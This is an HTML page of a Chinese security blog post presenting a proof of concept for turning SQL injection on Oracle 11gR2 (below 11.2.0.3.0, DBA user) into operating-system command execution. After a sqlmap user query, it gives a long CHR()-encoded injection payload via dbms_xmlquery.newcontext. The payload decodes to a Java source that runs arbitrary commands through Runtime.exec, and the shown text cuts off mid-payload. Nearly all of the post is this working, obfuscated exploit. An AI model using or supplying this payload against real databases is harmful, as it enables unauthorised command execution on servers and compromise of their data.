<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="tiehanhan" />
  <meta name="description" content="" />
  
  
  <title>
    
      Oracle 11gR2注入的一种命令执行姿势 
      
      
      |
    
     daidaitiehanhan&#39;s blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/avatar.gif">
    <link rel="icon" href="/images/avatar.gif">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>

<meta name="generator" content="Hexo 6.1.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.gif" alt="">
      
    </a>
    <div class="nickname"><a href="/">tiehanhan</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">Oracle 11gR2注入的一种命令执行姿势</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2022-04-14 22:36:19
        </span>
        
      </div>
      <div class="markdown-body">
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>19年的时候笔者在部门内部做过一些关于Oracle的分享，里面有一种通过注入实现rce的poc，我查了下现在似乎也没搜到相关的公开文章，所以水水这个poc</p>
<h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h2><p>注入情景，当前用户是dba权限，且数据库版本低于11.2.0.3.0</p>
<h2 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h2><h4 id="查询当前用户名"><a href="#查询当前用户名" class="headerlink" title="查询当前用户名:"></a>查询当前用户名:</h4><p>sqlmap执行</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Select</span> <span class="keyword">user</span> <span class="keyword">from</span> dual</span><br></pre></td></tr></table></figure>

<h4 id="创建java依赖"><a href="#创建java依赖" class="headerlink" title="创建java依赖"></a>创建java依赖</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> (<span class="keyword">select</span> dbms_xmlquery.newcontext(CHR(<span class="number">68</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">67</span>)<span class="operator">||</span>CHR(<span class="number">76</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">80</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">71</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">85</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">79</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">79</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">79</span>)<span class="operator">||</span>CHR(<span class="number">85</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">95</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">67</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">79</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">66</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">71</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">88</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">67</span>)<span class="operator">||</span>CHR(<span class="number">85</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">68</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">39</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">106</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">118</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">34</span>)<span class="operator">||</span>CHR(<span class="number">76</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">120</span>)<span class="operator">||</span>CHR(<span class="number">85</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">34</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">106</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">118</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">42</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">98</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">76</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">120</span>)<span class="operator">||</span>CHR(<span class="number">85</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">120</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">79</span>)<span class="operator">||</span>CHR(<span class="number">98</span>)<span class="operator">||</span>CHR(<span class="number">106</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">123</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">98</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">67</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">68</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">123</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">121</span>)<span class="operator">||</span>CHR(<span class="number">123</span>)<span class="operator">||</span>CHR(<span class="number">66</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">102</span>)<span class="operator">||</span>CHR(<span class="number">102</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">121</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">61</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">119</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">66</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">102</span>)<span class="operator">||</span>CHR(<span class="number">102</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">119</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">120</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">44</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">61</span>)<span class="operator">||</span>CHR(<span class="number">34</span>)<span class="operator">||</span>CHR(<span class="number">34</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">119</span>)<span class="operator">||</span>CHR(<span class="number">104</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">61</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">121</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">76</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">33</span>)<span class="operator">||</span>CHR(<span class="number">61</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">43</span>)<span class="operator">||</span>CHR(<span class="number">61</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">43</span>)<span class="operator">||</span>CHR(<span class="number">34</span>)<span class="operator">||</span>CHR(<span class="number">92</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">34</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">121</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">125</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">104</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">120</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">123</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">125</span>)<span class="operator">||</span>CHR(<span class="number">125</span>)<span class="operator">||</span>CHR(<span class="number">125</span>)<span class="operator">||</span>CHR(<span class="number">39</span>)<span 